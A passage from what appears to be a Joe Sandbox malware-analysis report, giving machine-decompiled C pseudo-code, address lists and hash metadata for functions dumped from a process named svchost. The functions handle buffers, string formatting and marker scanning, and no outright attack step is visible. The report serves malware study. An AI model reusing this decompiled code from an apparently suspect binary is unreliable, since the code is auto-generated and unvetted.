                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				intOrPtr* _v84;
                                                                                                                                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                                                            				void* _t101;
                                                                                                                                                                                                                                                                            				void* _t108;
                                                                                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                                                                                                                            				void* _t159;
                                                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t157 = __esi;
                                                                                                                                                                                                                                                                            				_t156 = __edi;
                                                                                                                                                                                                                                                                            				_t108 = __ebx;
                                                                                                                                                                                                                                                                            				_v16 =  *0x429024 ^ _t158;
                                                                                                                                                                                                                                                                            				_v80 = __ecx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                            					_v36 =  *0x426fa8;
                                                                                                                                                                                                                                                                            					_v32 =  *0x426fac;
                                                                                                                                                                                                                                                                            					_v28 =  *0x426fb0;
                                                                                                                                                                                                                                                                            					_v24 =  *0x426fb4;
                                                                                                                                                                                                                                                                            					_v20 =  *0x426fb8;
                                                                                                                                                                                                                                                                            					_t74 = E04020CE0(8);
                                                                                                                                                                                                                                                                            					_t159 = _t159 + 4;
                                                                                                                                                                                                                                                                            					_v52 = _t74;
                                                                                                                                                                                                                                                                            					if(_v52 == 0) {
                                                                                                                                                                                                                                                                            						_v84 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v84 = E0401F4E0(_v52);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v12 = _v84;
                                                                                                                                                                                                                                                                            					E0401FC90(_t108, _v12, _t156, _t157,  &_v36, 0x10);
                                                                                                                                                                                                                                                                            					if((E04015C60(_t108, _v80, _v84, _v12) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_v44 = 0;
                                                                                                                                                                                                                                                                            						_t83 = E0401BCB0(_t156, 4,  *_v12,  &_v44);
                                                                                                                                                                                                                                                                            						_t159 = _t159 + 0xc;
                                                                                                                                                                                                                                                                            						_v40 = _t83;
                                                                                                                                                                                                                                                                            						if(_v40 > 0) {
                                                                                                                                                                                                                                                                            							_v56 = E04020CE0(0x11);
                                                                                                                                                                                                                                                                            							_v48 = _v56;
                                                                                                                                                                                                                                                                            							E04007010(_t156, _v48, 0, 0x11);
                                                                                                                                                                                                                                                                            							 *0x4251f8(_v48, 0x10, 0x426fbc,  *( *_v44 + 4) & 0xff, ( *( *_v44 + 4) & 0xffff) >> 0x00000008 & 0xff,  *( *_v44 + 4) >> 0x00000010 & 0xff, ( *( *_v44 + 4) >> 0x00000010 & 0xffff) >> 0x00000008 & 0xff);
                                                                                                                                                                                                                                                                            							_t99 = E04020CE0(8);
                                                                                                                                                                                                                                                                            							_t163 = _t159 + 0x30;
                                                                                                                                                                                                                                                                            							_v60 = _t99;
                                                                                                                                                                                                                                                                            							if(_v60 == 0) {
                                                                                                                                                                                                                                                                            								_v88 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v88 = E0401F4E0(_v60);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v8 = _v88;
                                                                                                                                                                                                                                                                            							_t101 = E040070A0(_v48);
                                                                                                                                                                                                                                                                            							_t159 = _t163 + 4;
                                                                                                                                                                                                                                                                            							E0401FC90(_t108, _v8, _t156, _t157, _v48, _t101);
                                                                                                                                                                                                                                                                            							if(_v48 != 0) {
                                                                                                                                                                                                                                                                            								_v64 = _v48;
                                                                                                                                                                                                                                                                            								E04020CC0(_v64);
                                                                                                                                                                                                                                                                            								_t159 = _t159 + 4;
                                                                                                                                                                                                                                                                            								_v48 = 0x666;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if(_v44 != 0) {
                                                                                                                                                                                                                                                                            								_v68 = _v44;
                                                                                                                                                                                                                                                                            								E04020CC0(_v68);
                                                                                                                                                                                                                                                                            								_t159 = _t159 + 4;
                                                                                                                                                                                                                                                                            								_v44 = 0x666;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v76 = _v12;
                                                                                                                                                                                                                                                                            						_v72 = _v76;
                                                                                                                                                                                                                                                                            						if(_v72 == 0) {
                                                                                                                                                                                                                                                                            							_v92 = 0;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v92 = E04004EA0(_v72, 1);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v12 = 0x666;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} while (0 != 0);
                                                                                                                                                                                                                                                                            				return E04006C8C(_v8, _t108, _v16 ^ _t158, 0, _t156, _t157);
                                                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                                                            0x04012470
                                                                                                                                                                                                                                                                            0x04012470
                                                                                                                                                                                                                                                                            0x04012470
                                                                                                                                                                                                                                                                            0x0401247d
                                                                                                                                                                                                                                                                            0x04012480
                                                                                                                                                                                                                                                                            0x04012483
                                                                                                                                                                                                                                                                            0x0401248a
                                                                                                                                                                                                                                                                            0x0401248f
                                                                                                                                                                                                                                                                            0x04012498
                                                                                                                                                                                                                                                                            0x040124a1
                                                                                                                                                                                                                                                                            0x040124a9
                                                                                                                                                                                                                                                                            0x040124b2
                                                                                                                                                                                                                                                                            0x040124b7
                                                                                                                                                                                                                                                                            0x040124bc
                                                                                                                                                                                                                                                                            0x040124bf
                                                                                                                                                                                                                                                                            0x040124c6
                                                                                                                                                                                                                                                                            0x040124d5
                                                                                                                                                                                                                                                                            0x040124c8
                                                                                                                                                                                                                                                                            0x040124d0
                                                                                                                                                                                                                                                                            0x040124d0
                                                                                                                                                                                                                                                                            0x040124df
                                                                                                                                                                                                                                                                            0x040124eb
                                                                                                                                                                                                                                                                            0x04012501
                                                                                                                                                                                                                                                                            0x04012507
                                                                                                                                                                                                                                                                            0x0401251a
                                                                                                                                                                                                                                                                            0x0401251f
                                                                                                                                                                                                                                                                            0x04012522
                                                                                                                                                                                                                                                                            0x04012529
                                                                                                                                                                                                                                                                            0x04012539
                                                                                                                                                                                                                                                                            0x0401253f
                                                                                                                                                                                                                                                                            0x0401254a
                                                                                                                                                                                                                                                                            0x040125d3
                                                                                                                                                                                                                                                                            0x040125de
                                                                                                                                                                                                                                                                            0x040125e3
                                                                                                                                                                                                                                                                            0x040125e6
                                                                                                                                                                                                                                                                            0x040125ed
                                                                                                                                                                                                                                                                            0x040125fc
                                                                                                                                                                                                                                                                            0x040125ef
                                                                                                                                                                                                                                                                            0x040125f7
                                                                                                                                                                                                                                                                            0x040125f7
                                                                                                                                                                                                                                                                            0x04012606
                                                                                                                                                                                                                                                                            0x0401260d
                                                                                                                                                                                                                                                                            0x04012612
                                                                                                                                                                                                                                                                            0x0401261d
                                                                                                                                                                                                                                                                            0x04012626
                                                                                                                                                                                                                                                                            0x0401262b
                                                                                                                                                                                                                                                                            0x04012632
                                                                                                                                                                                                                                                                            0x04012637
                                                                                                                                                                                                                                                                            0x0401263a
                                                                                                                                                                                                                                                                            0x0401263a
                                                                                                                                                                                                                                                                            0x04012645
                                                                                                                                                                                                                                                                            0x0401264a
                                                                                                                                                                                                                                                                            0x04012651
                                                                                                                                                                                                                                                                            0x04012656
                                                                                                                                                                                                                                                                            0x04012659
                                                                                                                                                                                                                                                                            0x04012659
                                                                                                                                                                                                                                                                            0x04012645
                                                                                                                                                                                                                                                                            0x04012529
                                                                                                                                                                                                                                                                            0x04012664
                                                                                                                                                                                                                                                                            0x04012669
                                                                                                                                                                                                                                                                            0x0401266f
                                                                                                                                                                                                                                                                            0x04012676
                                                                                                                                                                                                                                                                            0x04012687
                                                                                                                                                                                                                                                                            0x04012678
                                                                                                                                                                                                                                                                            0x04012682
                                                                                                                                                                                                                                                                            0x04012682
                                                                                                                                                                                                                                                                            0x0401268e
                                                                                                                                                                                                                                                                            0x0401268e
                                                                                                                                                                                                                                                                            0x04012695
                                                                                                                                                                                                                                                                            0x040126ad

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040124CB
                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0401254A
                                                                                                                                                                                                                                                                            • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040125F2
                                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 0401260D
                                                                                                                                                                                                                                                                            • codecvt.LIBCPMTD ref: 0401267D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Iterator_baseIterator_base::_std::_$_memset_strlencodecvt
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2459447590-0
                                                                                                                                                                                                                                                                            • Opcode ID: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                                                                                                            • Instruction ID: 2d0a0b2a9c0e8f4d9cfb9b2fe2ef08dc32606c7a33a305a0369b3e2b17122581
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 837138B0E002199FEB14DFA8D984BEDBBB1FF88318F148169E405BB390D775A944CB54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                                                            			E040135C0(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v9;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				intOrPtr* _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                                                            				intOrPtr* _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr* _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                                                                                                                            				intOrPtr _t92;
                                                                                                                                                                                                                                                                            				intOrPtr _t95;
                                                                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t98 = __ebx;
                                                                                                                                                                                                                                                                            				_v52 = __ecx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				_v9 = 0;
                                                                                                                                                                                                                                                                            				while(_a4 != 0) {
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)( *_v52 + 0x2c)) >= 1) {
                                                                                                                                                                                                                                                                            						_v16 = 0;
                                                                                                                                                                                                                                                                            						while(_v16 <  *((intOrPtr*)( *_v52 + 0x2c))) {
                                                                                                                                                                                                                                                                            							_t81 = E04020CE0(8);
                                                                                                                                                                                                                                                                            							_t128 = _t128 + 4;
                                                                                                                                                                                                                                                                            							_v28 = _t81;
                                                                                                                                                                                                                                                                            							if(_v28 == 0) {
                                                                                                                                                                                                                                                                            								_v60 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v60 = E0401F4E0(_v28);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v20 = _v60;
                                                                                                                                                                                                                                                                            							E0401F9F0(_t98, _v20, _a4,  *((intOrPtr*)(_a4 + 0x1c)),  *((intOrPtr*)(_a4 + 0x20)), 0);
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_v52 + 0x10)) = _v16;
                                                                                                                                                                                                                                                                            							if((E04015C60(_t98, _v52, _v16, _v20) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            								if(_v8 == 0) {
                                                                                                                                                                                                                                                                            									_t92 = E04020CE0(8);
                                                                                                                                                                                                                                                                            									_t128 = _t128 + 4;
                                                                                                                                                                                                                                                                            									_v32 = _t92;
                                                                                                                                                                                                                                                                            									if(_v32 == 0) {
                                                                                                                                                                                                                                                                            										_v64 = 0;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_v64 = E0401F4E0(_v32);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v8 = _v64;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								E0401F9F0(_t98, _v8, _v20,  *_v20,  *((intOrPtr*)(_v20 + 4)), 0);
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v9 = 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if(_v20 != 0) {
                                                                                                                                                                                                                                                                            								_v40 = _v20;
                                                                                                                                                                                                                                                                            								_v36 = _v40;
                                                                                                                                                                                                                                                                            								if(_v36 == 0) {
                                                                                                                                                                                                                                                                            									_v68 = 0;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v68 = E04004EA0(_v36, 1);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v20 = 0x666;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L30;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t95 = E04020CE0(8);
                                                                                                                                                                                                                                                                            						_t128 = _t128 + 4;
                                                                                                                                                                                                                                                                            						_v24 = _t95;
                                                                                                                                                                                                                                                                            						if(_v24 == 0) {
                                                                                                                                                                                                                                                                            							_v56 = 0;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v56 = E0401F4E0(_v24);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v8 = _v56;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 4)) = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L30:
                                                                                                                                                                                                                                                                            					if((_v9 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						if(_v8 != 0) {
                                                                                                                                                                                                                                                                            							_v48 = _v8;
                                                                                                                                                                                                                                                                            							_v44 = _v48;
                                                                                                                                                                                                                                                                            							if(_v44 == 0) {
                                                                                                                                                                                                                                                                            								_v72 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v72 = E04004EA0(_v44, 1);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v8 = 0x666;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(0 != 0) {
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L38;
                                                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                                                            0x040135c0
                                                                                                                                                                                                                                                                            0x040135c6
                                                                                                                                                                                                                                                                            0x040135c9
                                                                                                                                                                                                                                                                            0x040135d0
                                                                                                                                                                                                                                                                            0x040135d4
                                                                                                                                                                                                                                                                            0x040135e8
                                                                                                                                                                                                                                                                            0x04013626
                                                                                                                                                                                                                                                                            0x04013638
                                                                                                                                                                                                                                                                            0x0401364b
                                                                                                                                                                                                                                                                            0x04013650
                                                                                                                                                                                                                                                                            0x04013653
                                                                                                                                                                                                                                                                            0x0401365a
                                                                                                                                                                                                                                                                            0x04013669
                                                                                                                                                                                                                                                                            0x0401365c
                                                                                                                                                                                                                                                                            0x04013664
                                                                                                                                                                                                                                                                            0x04013664
                                                                                                                                                                                                                                                                            0x04013673
                                                                                                                                                                                                                                                                            0x04013689
                                                                                                                                                                                                                                                                            0x04013694
                                                                                                                                                                                                                                                                            0x040136a8
                                                                                                                                                                                                                                                                            0x040136b4
                                                                                                                                                                                                                                                                            0x040136b8
                                                                                                                                                                                                                                                                            0x040136bd
                                                                                                                                                                                                                                                                            0x040136c0
                                                                                                                                                                                                                                                                            0x040136c7
                                                                                                                                                                                                                                                                            0x040136d6
                                                                                                                                                                                                                                                                            0x040136c9
                                                                                                                                                                                                                                                                            0x040136d1
                                                                                                                                                                                                                                                                            0x040136d1
                                                                                                                                                                                                                                                                            0x040136e0
                                                                                                                                                                                                                                                                            0x040136e0
                                                                                                                                                                                                                                                                            0x040136f5
                                                                                                                                                                                                                                                                            0x040136aa
                                                                                                                                                                                                                                                                            0x040136aa
                                                                                                                                                                                                                                                                            0x040136aa
                                                                                                                                                                                                                                                                            0x040136fe
                                                                                                                                                                                                                                                                            0x04013703
                                                                                                                                                                                                                                                                            0x04013709
                                                                                                                                                                                                                                                                            0x04013710
                                                                                                                                                                                                                                                                            0x04013721
                                                                                                                                                                                                                                                                            0x04013712
                                                                                                                                                                                                                                                                            0x0401371c
                                                                                                                                                                                                                                                                            0x0401371c
                                                                                                                                                                                                                                                                            0x04013728
                                                                                                                                                                                                                                                                            0x04013728
                                                                                                                                                                                                                                                                            0x04013735
                                                                                                                                                                                                                                                                            0x04013635
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013737
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013735
                                                                                                                                                                                                                                                                            0x040135ea
                                                                                                                                                                                                                                                                            0x040135ec
                                                                                                                                                                                                                                                                            0x040135f1
                                                                                                                                                                                                                                                                            0x040135f4
                                                                                                                                                                                                                                                                            0x040135fb
                                                                                                                                                                                                                                                                            0x0401360a
                                                                                                                                                                                                                                                                            0x040135fd
                                                                                                                                                                                                                                                                            0x04013605
                                                                                                                                                                                                                                                                            0x04013605
                                                                                                                                                                                                                                                                            0x04013614
                                                                                                                                                                                                                                                                            0x0401361a
                                                                                                                                                                                                                                                                            0x0401361a
                                                                                                                                                                                                                                                                            0x0401373e
                                                                                                                                                                                                                                                                            0x04013744
                                                                                                                                                                                                                                                                            0x0401374a
                                                                                                                                                                                                                                                                            0x0401374f
                                                                                                                                                                                                                                                                            0x04013755
                                                                                                                                                                                                                                                                            0x0401375c
                                                                                                                                                                                                                                                                            0x0401376d
                                                                                                                                                                                                                                                                            0x0401375e
                                                                                                                                                                                                                                                                            0x04013768
                                                                                                                                                                                                                                                                            0x04013768
                                                                                                                                                                                                                                                                            0x04013774
                                                                                                                                                                                                                                                                            0x04013774
                                                                                                                                                                                                                                                                            0x0401377b
                                                                                                                                                                                                                                                                            0x0401377b
                                                                                                                                                                                                                                                                            0x04013784
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0401378a
                                                                                                                                                                                                                                                                            0x04013790
                                                                                                                                                                                                                                                                            0x04013790
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013600
                                                                                                                                                                                                                                                                            • codecvt.LIBCPMTD ref: 04013763
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Iterator_baseIterator_base::_codecvtstd::_
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3817610042-0
                                                                                                                                                                                                                                                                            • Opcode ID: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                                                                                                            • Instruction ID: 940426154ba22623eb4585301945e88a2baf8d43e6e943a63c159829dd530f10
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 355105B4E01219EFEB14DF94D594BEEBBB1BB48308F208169E8057B3A0D7756A44CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                                                            			E04026C40(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				signed int _v37;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr* _v64;
                                                                                                                                                                                                                                                                            				signed short* _v68;
                                                                                                                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                                                                                                                                            				char _v92;
                                                                                                                                                                                                                                                                            				signed short* _v96;
                                                                                                                                                                                                                                                                            				signed short* _v100;
                                                                                                                                                                                                                                                                            				signed short* _v104;
                                                                                                                                                                                                                                                                            				char _v108;
                                                                                                                                                                                                                                                                            				intOrPtr _v112;
                                                                                                                                                                                                                                                                            				signed short* _v116;
                                                                                                                                                                                                                                                                            				intOrPtr _v120;
                                                                                                                                                                                                                                                                            				signed short* _v124;
                                                                                                                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                                                                                                                            				intOrPtr _v132;
                                                                                                                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                                                                                                                            				intOrPtr _v144;
                                                                                                                                                                                                                                                                            				intOrPtr _v148;
                                                                                                                                                                                                                                                                            				intOrPtr _t154;
                                                                                                                                                                                                                                                                            				intOrPtr _t172;
                                                                                                                                                                                                                                                                            				intOrPtr _t177;
                                                                                                                                                                                                                                                                            				signed int _t183;
                                                                                                                                                                                                                                                                            				void* _t187;
                                                                                                                                                                                                                                                                            				intOrPtr _t191;
                                                                                                                                                                                                                                                                            				intOrPtr _t195;
                                                                                                                                                                                                                                                                            				signed short* _t201;
                                                                                                                                                                                                                                                                            				void* _t204;
                                                                                                                                                                                                                                                                            				intOrPtr _t205;
                                                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                                                            				void* _t268;
                                                                                                                                                                                                                                                                            				void* _t269;
                                                                                                                                                                                                                                                                            				signed int _t270;
                                                                                                                                                                                                                                                                            				void* _t271;
                                                                                                                                                                                                                                                                            				void* _t272;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t269 = __esi;
                                                                                                                                                                                                                                                                            				_t268 = __edi;
                                                                                                                                                                                                                                                                            				_t210 = __ebx;
                                                                                                                                                                                                                                                                            				_v20 =  *0x429024 ^ _t270;
                                                                                                                                                                                                                                                                            				_v28 =  *0x42741c;
                                                                                                                                                                                                                                                                            				_v24 =  *0x427420;
                                                                                                                                                                                                                                                                            				_t246 =  *0x427424;
                                                                                                                                                                                                                                                                            				_v16 =  *0x427424;
                                                                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                                                                            				_t154 = E04020CE0(8);
                                                                                                                                                                                                                                                                            				_t272 = _t271 + 4;
                                                                                                                                                                                                                                                                            				_v112 = _t154;
                                                                                                                                                                                                                                                                            				if(_v112 == 0) {
                                                                                                                                                                                                                                                                            					_v140 = 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v140 = E0401F4E0(_v112);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v8 = _v140;
                                                                                                                                                                                                                                                                            				while(_a4 != 0 && _a8 >= 4) {
                                                                                                                                                                                                                                                                            					_t246 = _a4;
                                                                                                                                                                                                                                                                            					E0401F9F0(_t210, _v8, _a4, _a4, _a8, 0);
                                                                                                                                                                                                                                                                            					_v36 = 0;
                                                                                                                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                                                                                                                            					_v37 = 0;
                                                                                                                                                                                                                                                                            					while((_v37 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						_t246 =  &_v28;
                                                                                                                                                                                                                                                                            						_v36 = E0401F370(_v8,  &_v28, 4, _v36);
                                                                                                                                                                                                                                                                            						if(_v36 >= 0) {
                                                                                                                                                                                                                                                                            							_v36 = _v36 + 4;
                                                                                                                                                                                                                                                                            							_t246 =  &_v16;
                                                                                                                                                                                                                                                                            							_v32 = E0401F370(_v8,  &_v16, 3, _v36);
                                                                                                                                                                                                                                                                            							if(_v32 >= 0) {
                                                                                                                                                                                                                                                                            								_v44 = _v32 - _v36;
                                                                                                                                                                                                                                                                            								_t246 = _v36;
                                                                                                                                                                                                                                                                            								_v52 = E0401F410(_v8,  &_v28, 4, _v36, _v44);
                                                                                                                                                                                                                                                                            								if(_v52 <= 0xffffffff) {
                                                                                                                                                                                                                                                                            									_v56 = 0;
                                                                                                                                                                                                                                                                            									_t172 = E0401EAF0(_t268, _a4 + _v36, _v32 - _v36,  &_v56);
                                                                                                                                                                                                                                                                            									_t272 = _t272 + 0xc;
                                                                                                                                                                                                                                                                            									_v48 = _t172;
                                                                                                                                                                                                                                                                            									if(_v48 <= 4 || _v56 == 0) {
                                                                                                                                                                                                                                                                            										L47:
                                                                                                                                                                                                                                                                            										_t246 = _v37 & 0x000000ff;
                                                                                                                                                                                                                                                                            										if((_v37 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            											_v36 = _v32 + 3;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										continue;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_t177 = E040223A0(_v56 + 4, _v48 - 4);
                                                                                                                                                                                                                                                                            										_t272 = _t272 + 8;
                                                                                                                                                                                                                                                                            										_v60 = _t177;
                                                                                                                                                                                                                                                                            										if(_v60 !=  *_v56) {
                                                                                                                                                                                                                                                                            											L45:
                                                                                                                                                                                                                                                                            											if(_v56 != 0) {
                                                                                                                                                                                                                                                                            												_v128 = _v56;
                                                                                                                                                                                                                                                                            												E04020CC0(_v128);
                                                                                                                                                                                                                                                                            												_t272 = _t272 + 4;
                                                                                                                                                                                                                                                                            												_v56 = 0x666;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											goto L47;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_v64 = _v56 + 4;
                                                                                                                                                                                                                                                                            										_t229 = _v48 - 4;
